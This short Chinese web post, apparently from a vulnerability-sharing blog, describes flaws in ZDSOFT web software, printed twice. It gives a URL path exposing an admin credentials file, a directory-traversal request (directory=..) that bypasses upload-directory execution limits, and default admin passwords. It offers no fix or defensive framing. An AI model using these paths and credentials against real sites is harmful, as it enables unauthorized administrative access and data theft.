ZDSOFT 漏洞

  • A+
所属分类:漏洞时代
摘要

/images/database/admin.xml
可以看到管理用户账户密码
editor/dialog/selectPageBg.aspx?position=&directory=..
变量directory是路径,..表示跟目录,绕过Image目录无执行权限
后台默认密码:zdsoft 123 zdsoft admin

/images/database/admin.xml
可以看到管理用户账户密码
editor/dialog/selectPageBg.aspx?position=&directory=..
变量directory是路径,..表示跟目录,绕过Image目录无执行权限
后台默认密码:zdsoft 123 zdsoft admin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: